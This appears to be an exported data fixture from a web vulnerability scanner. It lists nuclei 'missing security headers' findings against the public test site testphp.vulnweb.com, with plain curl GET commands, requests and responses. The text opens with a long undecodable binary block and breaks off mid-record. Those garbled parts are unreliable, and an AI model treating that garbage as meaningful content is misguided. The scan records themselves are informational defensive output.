ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 720, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:41:49.520Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 721, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:41:49.677Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 722, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:49.830Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 723, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:49.989Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 724, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:50.160Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 725, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:50.320Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 726, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:50.477Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 727, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:50.643Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 728, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:50.812Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 729, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": 